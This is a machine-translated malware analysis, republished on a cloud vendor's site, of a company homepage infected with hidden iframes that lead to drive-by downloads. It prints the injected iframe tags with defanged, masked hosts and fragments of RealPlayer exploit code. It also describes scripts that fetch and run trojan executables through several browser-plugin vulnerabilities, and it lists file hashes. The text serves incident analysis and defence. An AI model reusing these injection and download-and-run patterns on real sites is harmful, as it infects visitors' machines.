A god wine company in Bama is infected with worm. win32.downloader/Trojan. win32.mnless.

Last Update:2018-12-05 Source: Internet

Author: User

Tags crc32 sha1

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

A god wine company in Bama is infected with worm. win32.downloader/Trojan. win32.mnless.

EndurerOriginal
1Version

Check the homepage code and find that the code is added multiple times:
/---
<Ifame src = hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 075 width = 1 name = '000000' Height = 1> </iframe>

<Ifame src = hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 013 width = 1 Height = 1> </iframe>
<Ifame src = hxxp: // www. f ** oafa ** U. info/ms30.htm? 823 width = 1 name = '000000' Height = 1> </iframe> <ifame src = hxxp: // A **. ll * sging **. COM/ww/new05.htm? 075 width = 1 name = '000000' Height = 1> </iframe>
---/

Hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 075 contains code:
/---
<Ifame src = hxxp: // A ** A. ll * sging **. com/AA/haha.htm width = 5 Height = 5> </iframe>
<Ifame src = hxxp: // A ** A. ll * sging **. com/AA/gege.htm width = 5 Height = 5> </iframe>
---/

Hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 013 and hxxp: // A ** A. ll * sging **. com/ww/new05.htm? Same as 075.

Hxxp: // A ** A. ll * sging **. com/AA/haha.htm is decrypted twice to obtain the original code. The function is to check the cookie variable OK and output the Code:
/---
<SCRIPT src = hxxp: // AA. ll * sging **. com/AA/11.js> </SCRIPT>
<SCRIPT src = hxxp: // AA. ll * sging **. com/AA/BB. js> </SCRIPT>
<Ifame width = '10' Height = '10' src = 'hxxp: // A **. ll * sging **. COM/AA/bf.html '> </iframe>
---/
Use the storm video vulnerability and baidubar. tool to download hxxp: // down. ll * sging **. com/BB/Bd. Cab

File Description: D:/test/Bd. Cab
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:45:22
Modification time: 23:45:30
Access time:
Size: 34045 bytes, 33.253 KB
MD5: 67e8a38e7570de02ec1e3b0fec7ac9d9
Sha1: 9ef39949c850cfe8c03f76fa0dfc7ec3bd286254
CRC32: 888380b0

File Description: D:/test/bd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 34837 bytes, 34.21 KB
MD5: 865188f4f8583f4c0728553b04375261
Sha1: bf3b97ae81f49caf96268ef4cff5b96c18eb88
CRC32: deed8b5c

Kaspersky reportsWorm. win32.downloader. Bi
RisingTrojan. win32.mnless. znc nspack

Hxxp: // A **. ll * sging **. COM/AA/11.js is decrypted once to obtain the original code. The function is to download hxxp: // down. ll * sging **. COM/BB/014.exe, Save As ntuser.com, and run.

File Description: D:/test/014.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:42:45
Modification time: 23:42:46
Access time:
Size: 34854 bytes, 34.38 KB
MD5: 19a5e9859be41540446fd3d7b6533d23
Sha1: 5b3a4028a4e85422acaa3f7f974ecbb5d35e936b
CRC32: 57901cec
Kaspersky reports worm. win32.downloader. BD
Rising Star: Backdoor. win32.agent. Yos nspack

Hxxp: // A ** A. ll * sging **. com/AA/BB. JS is the code used to exploit storm audio and video vulnerabilities.

Hxxp: // A ** A. ll * sging **. com/AA/PPP. js uses the PPStream vulnerability code.

Hxxp: // A ** A. ll * sging **. com/AA/bf.html is
Code for the stack overflow vulnerability of the lianzhong connectandenterroom ActiveX control.

Refer:
Lianzhong connectandenterroom ActiveX Control Stack Overflow Vulnerability
Http://www.nsfocus.net/vulndb/11122

Hxxp: // A ** A. ll * sging **. com/AA/gege.htm decrypted twice to obtain the original code. The code used for the RealPlayer vulnerability is interesting:
/---
Payload + = "yuange"; real. Import ("C: \ Program Files \ netmeeting \ testsnd.wav", payload, "",)}; realexploit ();)
---/

Hxxp: // www. f ** oafa ** U. info/ms30.htm? 823 contains code
/---
<HTML>
<Ifame src = "88/881. htm" width = "20" Height = "0" frameborder = "0"> </iframe>
<Ifame src = "88/883. htm" width = "1" Height = "1" frameborder = "0"> </iframe>
</Html>
---/

Hxxp: // www. f ** oafa ** U. info/88/881 .htm utilizing MS06-014: msadco. download hxxp: // www. * 6 * 8y ** u *. CN/68down.exe, save as C:/Microsoft. PIF, by creating the file C:/Microsoft. vbs to start. The variable named qq784378237 in the code

File Description: D:/test/68down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 31876 bytes, 31.132 KB
MD5: 7f29c1dbaae355933130030aed699672
Sha1: 1a5ede06b6ccd19bb7fb9af3e9b0456e847bfdd0
CRC32: 2738d5ad

Kaspersky reports worm. win32.downloader. CG
The rising news is Trojan. win32.mnless. zyt.

Hxxp: // www. f ** oafa ** U. info/88/883 .htm is decrypted twice to obtain the original code, which is also used by the RealPlayer vulnerability. The last code is different from the above Code:
/---
Payload + = "chuizi ";
Real. Import ("C :\\ Program Files \ netmeeting \ testsnd.wav", payload, "", 0, 0 );
}
Realexploit ();)
---/

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More